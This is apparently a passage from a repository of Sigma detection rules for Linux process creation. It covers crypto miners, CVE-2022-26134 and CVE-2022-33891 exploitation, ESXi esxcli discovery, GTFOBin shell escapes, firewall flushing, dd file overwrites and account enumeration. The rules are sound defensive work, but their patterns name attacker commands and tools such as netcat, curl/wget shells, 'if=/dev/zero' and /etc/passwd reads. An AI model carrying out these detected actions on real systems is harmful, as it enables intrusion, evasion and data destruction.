23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml: -------------------------------------------------------------------------------- 1 | title: Linux Crypto Mining Indicators 2 | id: 9069ea3c-b213-4c52-be13-86506a227ab1 3 | status: test 4 | description: Detects command line parameters or strings often used by crypto miners 5 | references: 6 | - https://www.poolwatch.io/coin/monero 7 | author: Florian Roth (Nextron Systems) 8 | date: 2021/10/26 9 | modified: 2022/12/25 10 | tags: 11 | - attack.impact 12 | - attack.t1496 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | CommandLine|contains: 19 | - ' --cpu-priority=' 20 | - '--donate-level=0' 21 | - ' -o pool.' 22 | - ' --nicehash' 23 | - ' --algo=rx/0 ' 24 | - 'stratum+tcp://' 25 | - 'stratum+udp://' 26 | # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives 27 | - 'sh -c /sbin/modprobe msr allow_writes=on' 28 | # base64 encoded: --donate-level= 29 | - 'LS1kb25hdGUtbGV2ZWw9' 30 | - '0tZG9uYXRlLWxldmVsP' 31 | - 'tLWRvbmF0ZS1sZXZlbD' 32 | # base64 encoded: stratum+tcp:// and stratum+udp:// 33 | - 'c3RyYXR1bSt0Y3A6Ly' 34 | - 'N0cmF0dW0rdGNwOi8v' 35 | - 'zdHJhdHVtK3RjcDovL' 36 | - 'c3RyYXR1bSt1ZHA6Ly' 37 | - 'N0cmF0dW0rdWRwOi8v' 38 | - 'zdHJhdHVtK3VkcDovL' 39 | condition: selection 40 | falsepositives: 41 | - Legitimate use of crypto miners 42 | level: high 43 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_curl_usage.yml: -------------------------------------------------------------------------------- 1 | title: Curl Usage on Linux 2 | id: ea34fb97-e2c4-4afb-810f-785e4459b194 3 | status: test 4 | description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server 5 | references: 6 | - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/09/15 9 | tags: 10 | - attack.command_and_control 11 | - attack.t1105 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection: 17 | Image|endswith: '/curl' 18 | condition: selection 19 | falsepositives: 20 | - Scripts created by developers and admins 21 | - Administrative activity 22 | level: low 23 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml: -------------------------------------------------------------------------------- 1 | title: Atlassian Confluence CVE-2022-26134 2 | id: 7fb14105-530e-4e2e-8cfb-99f7d8700b66 3 | related: 4 | - id: 245f92e3-c4da-45f1-9070-bc552e06db11 5 | type: derived 6 | status: test 7 | description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134 8 | references: 9 | - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ 10 | author: Nasreddine Bencherchali (Nextron Systems) 11 | date: 2022/06/03 12 | tags: 13 | - attack.initial_access 14 | - attack.execution 15 | - attack.t1190 16 | - attack.t1059 17 | - cve.2022.26134 18 | logsource: 19 | category: process_creation 20 | product: linux 21 | detection: 22 | selection: 23 | # Monitor suspicious child processes spawned by Confluence 24 | ParentImage|startswith: '/opt/atlassian/confluence/' 25 | ParentImage|endswith: '/java' 26 | CommandLine|contains: 27 | - '/bin/sh' 28 | - 'bash' 29 | - 'dash' 30 | - 'ksh' 31 | - 'zsh' 32 | - 'csh' 33 | - 'fish' 34 | - 'curl' 35 | - 'wget' 36 | - 'python' 37 | condition: selection 38 | falsepositives: 39 | - Unknown 40 | level: high 41 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml: -------------------------------------------------------------------------------- 1 | title: Apache Spark Shell Command Injection - ProcessCreation 2 | id: c8a5f584-cdc8-42cc-8cce-0398e4265de3 3 | status: test 4 | description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective 5 | references: 6 | - https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py 7 | - https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html 8 | - https://github.com/apache/spark/pull/36315/files 9 | author: Nasreddine Bencherchali (Nextron Systems) 10 | date: 2022/07/20 11 | tags: 12 | - attack.initial_access 13 | - attack.t1190 14 | - cve.2022.33891 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | ParentImage|endswith: '\bash' 21 | CommandLine|contains: 22 | - 'id -Gn `' 23 | - "id -Gn '" 24 | condition: selection 25 | falsepositives: 26 | - Unlikely 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml: -------------------------------------------------------------------------------- 1 | title: DD File Overwrite 2 | id: 2953194b-e33c-4859-b9e8-05948c167447 3 | status: test 4 | description: Detects potential overwriting and deletion of a file using DD. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd 7 | author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC 8 | date: 2021/10/15 9 | modified: 2022/07/07 10 | tags: 11 | - attack.impact 12 | - attack.t1485 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection1: 18 | Image: 19 | - '/bin/dd' 20 | - '/usr/bin/dd' 21 | selection2: 22 | CommandLine|contains: 'of=' 23 | selection3: 24 | CommandLine|contains: 25 | - 'if=/dev/zero' 26 | - 'if=/dev/null' 27 | condition: all of selection* 28 | falsepositives: 29 | - Any user deleting files that way. 30 | level: low 31 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml: -------------------------------------------------------------------------------- 1 | title: Ufw Force Stop Using Ufw-Init 2 | id: 84c9e83c-599a-458a-a0cb-0ecce44e807a 3 | status: experimental 4 | description: Detects attempts to force stop the ufw using ufw-init 5 | references: 6 | - https://blogs.blackberry.com/ 7 | - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 8 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 9 | date: 2023/01/18 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1562.004 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection_init: 18 | CommandLine|contains|all: 19 | - '-ufw-init' 20 | - 'force-stop' 21 | selection_ufw: 22 | CommandLine|contains|all: 23 | - 'ufw' 24 | - 'disable' 25 | condition: 1 of selection_* 26 | falsepositives: 27 | - Network administrators 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_doas_execution.yml: -------------------------------------------------------------------------------- 1 | title: Linux Doas Tool Execution 2 | id: 067d8238-7127-451c-a9ec-fa78045b618b 3 | status: stable 4 | description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. 5 | references: 6 | - https://research.splunk.com/endpoint/linux_doas_tool_execution/ 7 | - https://www.makeuseof.com/how-to-install-and-use-doas/ 8 | author: Sittikorn S, Teoderick Contreras 9 | date: 2022/01/20 10 | tags: 11 | - attack.privilege_escalation 12 | - attack.t1548 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: '/doas' 19 | condition: selection 20 | falsepositives: 21 | - Unlikely 22 | level: low 23 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml: -------------------------------------------------------------------------------- 1 | title: ESXi Network Configuration Discovery Via ESXCLI 2 | id: 33e814e0-1f00-4e43-9c34-31fb7ae2b174 3 | status: experimental 4 | description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration. 5 | references: 6 | - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ 7 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_network.html 8 | author: Cedric Maurugeon 9 | date: 2023/09/04 10 | tags: 11 | - attack.discovery 12 | - attack.t1033 13 | - attack.t1007 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection_img: 19 | Image|endswith: '/esxcli' 20 | CommandLine|contains: 'network' 21 | selection_cli: 22 | CommandLine|contains: 23 | - ' get' 24 | - ' list' 25 | condition: all of selection_* 26 | falsepositives: 27 | - Legitimate administration activities 28 | # Note: level can be reduced to low in some envs 29 | level: medium 30 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml: -------------------------------------------------------------------------------- 1 | title: ESXi Admin Permission Assigned To Account Via ESXCLI 2 | id: 9691f58d-92c1-4416-8bf3-2edd753ec9cf 3 | status: experimental 4 | description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account. 5 | references: 6 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2023/09/04 9 | tags: 10 | - attack.execution 11 | logsource: 12 | category: process_creation 13 | product: linux 14 | detection: 15 | selection: 16 | Image|endswith: '/esxcli' 17 | CommandLine|contains: 'system' 18 | CommandLine|contains|all: 19 | - ' permission ' 20 | - ' set' 21 | - 'Admin' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administration activities 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml: -------------------------------------------------------------------------------- 1 | title: ESXi Storage Information Discovery Via ESXCLI 2 | id: f41dada5-3f56-4232-8503-3fb7f9cf2d60 3 | status: experimental 4 | description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit. 5 | references: 6 | - https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html 7 | - https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html 8 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_storage.html 9 | author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon 10 | date: 2023/09/04 11 | tags: 12 | - attack.discovery 13 | - attack.t1033 14 | - attack.t1007 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection_img: 20 | Image|endswith: '/esxcli' 21 | CommandLine|contains: 'storage' 22 | selection_cli: 23 | CommandLine|contains: 24 | - ' get' 25 | - ' list' 26 | condition: all of selection_* 27 | falsepositives: 28 | - Legitimate administration activities 29 | # Note: level can be reduced to low in some envs 30 | level: medium 31 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml: -------------------------------------------------------------------------------- 1 | title: ESXi Syslog Configuration Change Via ESXCLI 2 | id: 38eb1dbb-011f-40b1-a126-cf03a0210563 3 | status: experimental 4 | description: Detects changes to the ESXi syslog configuration via "esxcli" 5 | references: 6 | - https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US 7 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html 8 | author: Cedric Maurugeon 9 | date: 2023/09/04 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1562.001 13 | - attack.t1562.003 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | Image|endswith: '/esxcli' 20 | CommandLine|contains|all: 21 | - 'system' 22 | - 'syslog' 23 | - 'config' 24 | CommandLine|contains: ' set' 25 | condition: selection 26 | falsepositives: 27 | - Legitimate administrative activities 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml: -------------------------------------------------------------------------------- 1 | title: ESXi System Information Discovery Via ESXCLI 2 | id: e80273e1-9faf-40bc-bd85-dbaff104c4e9 3 | status: experimental 4 | description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc. 5 | references: 6 | - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ 7 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html 8 | author: Cedric Maurugeon 9 | date: 2023/09/04 10 | tags: 11 | - attack.discovery 12 | - attack.t1033 13 | - attack.t1007 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection_img: 19 | Image|endswith: '/esxcli' 20 | CommandLine|contains: 'system' 21 | selection_cli: 22 | CommandLine|contains: 23 | - ' get' 24 | - ' list' 25 | condition: all of selection_* 26 | falsepositives: 27 | - Legitimate administration activities 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml: -------------------------------------------------------------------------------- 1 | title: ESXi Account Creation Via ESXCLI 2 | id: b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db 3 | status: experimental 4 | description: Detects user account creation on ESXi system via esxcli 5 | references: 6 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html 7 | author: Cedric Maurugeon 8 | date: 2023/08/22 9 | tags: 10 | - attack.persistence 11 | - attack.t1136 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection: 17 | Image|endswith: '/esxcli' 18 | CommandLine|contains|all: 19 | - 'system ' 20 | - 'account ' 21 | - 'add ' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administration activities 25 | level: medium 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml: -------------------------------------------------------------------------------- 1 | title: ESXi VM List Discovery Via ESXCLI 2 | id: 5f1573a7-363b-4114-9208-ad7a61de46eb 3 | status: experimental 4 | description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs. 5 | references: 6 | - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ 7 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html 8 | - https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/ 9 | - https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html 10 | author: Cedric Maurugeon 11 | date: 2023/09/04 12 | tags: 13 | - attack.discovery 14 | - attack.t1033 15 | - attack.t1007 16 | logsource: 17 | category: process_creation 18 | product: linux 19 | detection: 20 | selection: 21 | Image|endswith: '/esxcli' 22 | CommandLine|contains: 'vm process' 23 | CommandLine|endswith: ' list' 24 | condition: selection 25 | falsepositives: 26 | - Legitimate administration activities 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml: -------------------------------------------------------------------------------- 1 | title: ESXi VM Kill Via ESXCLI 2 | id: 2992ac4d-31e9-4325-99f2-b18a73221bb2 3 | status: experimental 4 | description: Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM. 5 | references: 6 | - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ 7 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html 8 | - https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/ 9 | - https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html 10 | author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon 11 | date: 2023/09/04 12 | tags: 13 | - attack.execution 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | Image|endswith: '/esxcli' 20 | CommandLine|contains|all: 21 | - 'vm process' 22 | - 'kill' 23 | condition: selection 24 | falsepositives: 25 | - Legitimate administration activities 26 | level: medium 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml: -------------------------------------------------------------------------------- 1 | title: ESXi VSAN Information Discovery Via ESXCLI 2 | id: d54c2f06-aca9-4e2b-81c9-5317858f4b79 3 | status: experimental 4 | description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide. 5 | references: 6 | - https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html 7 | - https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html 8 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vsan.html 9 | author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon 10 | date: 2023/09/04 11 | tags: 12 | - attack.discovery 13 | - attack.t1033 14 | - attack.t1007 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection_img: 20 | Image|endswith: '/esxcli' 21 | CommandLine|contains: 'vsan' 22 | selection_cli: 23 | CommandLine|contains: 24 | - ' get' 25 | - ' list' 26 | condition: all of selection_* 27 | falsepositives: 28 | - Legitimate administration activities 29 | # Note: level can be reduced to low in some envs 30 | level: medium 31 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml: -------------------------------------------------------------------------------- 1 | title: File and Directory Discovery - Linux 2 | id: d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72 3 | status: test 4 | description: Detects usage of system utilities to discover files and directories 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md 7 | author: Daniil Yugoslavskiy, oscd.community 8 | date: 2020/10/19 9 | modified: 2022/11/25 10 | tags: 11 | - attack.discovery 12 | - attack.t1083 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | select_file_with_asterisk: 18 | Image|endswith: '/file' 19 | CommandLine|re: '(.){200,}' # execution of the 'file */* *>> /tmp/output.txt' will produce huge commandline 20 | select_recursive_ls: 21 | Image|endswith: '/ls' 22 | CommandLine|contains: '-R' 23 | select_find_execution: 24 | Image|endswith: '/find' 25 | select_tree_execution: 26 | Image|endswith: '/tree' 27 | condition: 1 of select* 28 | falsepositives: 29 | - Legitimate activities 30 | level: informational 31 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_file_deletion.yml: -------------------------------------------------------------------------------- 1 | title: File Deletion 2 | id: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57 3 | status: stable 4 | description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md 7 | author: Ömer Günal, oscd.community 8 | date: 2020/10/07 9 | modified: 2022/09/15 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1070.004 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: 19 | - '/rm' # covers /rmdir as well 20 | - '/shred' 21 | - '/unlink' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administration activities 25 | level: informational 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml: -------------------------------------------------------------------------------- 1 | title: OS Architecture Discovery Via Grep 2 | id: d27ab432-2199-483f-a297-03633c05bae6 3 | status: experimental 4 | description: | 5 | Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo" 6 | references: 7 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 8 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 9 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 10 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 11 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 12 | date: 2023/06/02 13 | tags: 14 | - attack.discovery 15 | - attack.t1082 16 | logsource: 17 | category: process_creation 18 | product: linux 19 | detection: 20 | selection_process: 21 | Image|endswith: '/grep' 22 | selection_architecture: 23 | CommandLine|endswith: 24 | - 'aarch64' 25 | - 'arm' 26 | - 'i386' 27 | - 'i686' 28 | - 'mips' 29 | - 'x86_64' 30 | condition: all of selection_* 31 | falsepositives: 32 | - Unknown 33 | level: low 34 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_groupdel.yml: -------------------------------------------------------------------------------- 1 | title: Group Has Been Deleted Via Groupdel 2 | id: 8a46f16c-8c4c-82d1-b121-0fdd3ba70a84 3 | status: test 4 | description: Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks 5 | references: 6 | - https://linuxize.com/post/how-to-delete-group-in-linux/ 7 | - https://www.cyberciti.biz/faq/linux-remove-user-command/ 8 | - https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/ 9 | - https://linux.die.net/man/8/groupdel 10 | author: Tuan Le (NCSGroup) 11 | date: 2022/12/26 12 | tags: 13 | - attack.impact 14 | - attack.t1531 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|endswith: '/groupdel' 21 | condition: selection 22 | falsepositives: 23 | - Legitimate administrator activities 24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml: -------------------------------------------------------------------------------- 1 | title: Apt GTFOBin Abuse - Linux 2 | id: bb382fd5-b454-47ea-a264-1828e4c766d6 3 | status: test 4 | description: Detects usage of "apt" and "apt-get" as a GTFOBin to execute and proxy command and binary execution 5 | references: 6 | - https://gtfobins.github.io/gtfobins/apt/ 7 | - https://gtfobins.github.io/gtfobins/apt-get/ 8 | author: Nasreddine Bencherchali (Nextron Systems) 9 | date: 2022/12/28 10 | tags: 11 | - attack.discovery 12 | - attack.t1083 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: 19 | - '/apt' 20 | - '/apt-get' 21 | CommandLine|contains: 'APT::Update::Pre-Invoke::=' 22 | condition: selection 23 | falsepositives: 24 | - Unknown 25 | level: medium 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml: -------------------------------------------------------------------------------- 1 | title: Vim GTFOBin Abuse - Linux 2 | id: 7ab8f73a-fcff-428b-84aa-6a5ff7877dea 3 | status: test 4 | description: Detects usage of "vim" and it's siblings as a GTFOBin to execute and proxy command and binary execution 5 | references: 6 | - https://gtfobins.github.io/gtfobins/vim/ 7 | - https://gtfobins.github.io/gtfobins/rvim/ 8 | - https://gtfobins.github.io/gtfobins/vimdiff/ 9 | author: Nasreddine Bencherchali (Nextron Systems) 10 | date: 2022/12/28 11 | tags: 12 | - attack.discovery 13 | - attack.t1083 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection_img: 19 | Image|endswith: 20 | - '/vim' 21 | - '/rvim' 22 | - '/vimdiff' 23 | CommandLine|contains: 24 | - ' -c ' 25 | - ' --cmd' 26 | selection_cli: 27 | CommandLine|contains: 28 | - ':!/' 29 | - ':py ' 30 | - ':lua ' 31 | - '/bin/sh' 32 | - '/bin/bash' 33 | - '/bin/dash' 34 | - '/bin/zsh' 35 | - '/bin/fish' 36 | condition: all of selection_* 37 | falsepositives: 38 | - Unknown 39 | level: high 40 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml: -------------------------------------------------------------------------------- 1 | title: Install Root Certificate 2 | id: 78a80655-a51e-4669-bc6b-e9d206a462ee 3 | status: test 4 | description: Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md 7 | author: Ömer Günal, oscd.community 8 | date: 2020/10/05 9 | modified: 2022/07/07 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1553.004 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: 19 | - '/update-ca-certificates' 20 | - '/update-ca-trust' 21 | condition: selection 22 | falsepositives: 23 | - Legitimate administration activities 24 | level: low 25 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Package Installed - Linux 2 | id: 700fb7e8-2981-401c-8430-be58e189e741 3 | status: test 4 | description: Detects installation of suspicious packages using system installation utilities 5 | references: 6 | - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2023/01/03 9 | tags: 10 | - attack.defense_evasion 11 | - attack.t1553.004 12 | logsource: 13 | product: linux 14 | category: process_creation 15 | detection: 16 | selection_tool_apt: 17 | Image|endswith: 18 | - '/apt' 19 | - '/apt-get' 20 | CommandLine|contains: 'install' 21 | selection_tool_yum: 22 | Image|endswith: '/yum' 23 | CommandLine|contains: 24 | - 'localinstall' 25 | - 'install' 26 | selection_tool_rpm: 27 | Image|endswith: '/rpm' 28 | CommandLine|contains: '-i' 29 | selection_tool_dpkg: 30 | Image|endswith: '/dpkg' 31 | CommandLine|contains: 32 | - '--install' 33 | - '-i' 34 | selection_keyword: 35 | CommandLine|contains: 36 | # Add more suspicious packages 37 | - 'nmap' 38 | - ' nc' 39 | - 'netcat' 40 | - 'wireshark' 41 | - 'tshark' 42 | - 'openconnect' 43 | - 'proxychains' 44 | condition: 1 of selection_tool_* and selection_keyword 45 | falsepositives: 46 | - Legitimate administration activities 47 | level: medium 48 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml: -------------------------------------------------------------------------------- 1 | title: Flush Iptables Ufw Chain 2 | id: 3be619f4-d9ec-4ea8-a173-18fdd01996ab 3 | status: experimental 4 | description: Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic 5 | references: 6 | - https://blogs.blackberry.com/ 7 | - https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html 8 | - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 9 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 10 | date: 2023/01/18 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1562.004 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection_img: 19 | Image|endswith: 20 | - '/iptables' 21 | - '/xtables-legacy-multi' 22 | - '/iptables-legacy-multi' 23 | - '/ip6tables' 24 | - '/ip6tables-legacy-multi' 25 | selection_params: 26 | CommandLine|contains: 27 | - '-F' 28 | - '-Z' 29 | - '-X' 30 | selection_ufw: 31 | CommandLine|contains: 32 | - 'ufw-logging-deny' 33 | - 'ufw-logging-allow' 34 | - 'ufw6-logging-deny' 35 | - 'ufw6-logging-allow' 36 | # - 'ufw-reject-output' 37 | # - 'ufw-track-inputt' 38 | condition: all of selection_* 39 | falsepositives: 40 | - Network administrators 41 | level: medium 42 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_kill_process.yml: -------------------------------------------------------------------------------- 1 | title: Terminate Linux Process Via Kill 2 | id: 64c41342-6b27-523b-5d3f-c265f3efcdb3 3 | status: experimental 4 | description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process. 5 | references: 6 | - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html 7 | - https://www.cyberciti.biz/faq/how-force-kill-process-linux/ 8 | author: Tuan Le (NCSGroup) 9 | date: 2023/03/16 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1562 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: 19 | - '/kill' 20 | - '/pkill' 21 | - '/killall' 22 | condition: selection 23 | falsepositives: 24 | - Likely 25 | level: low 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_local_account.yml: -------------------------------------------------------------------------------- 1 | title: Local System Accounts Discovery - Linux 2 | id: b45e3d6f-42c6-47d8-a478-df6bd6cf534c 3 | status: test 4 | description: Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md 7 | author: Alejandro Ortuno, oscd.community 8 | date: 2020/10/08 9 | modified: 2022/11/27 10 | tags: 11 | - attack.discovery 12 | - attack.t1087.001 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection_1: 18 | Image|endswith: '/lastlog' 19 | selection_2: 20 | CommandLine|contains: '''x:0:''' 21 | selection_3: 22 | Image|endswith: 23 | - '/cat' 24 | - '/head' 25 | - '/tail' 26 | - '/more' 27 | CommandLine|contains: 28 | - '/etc/passwd' 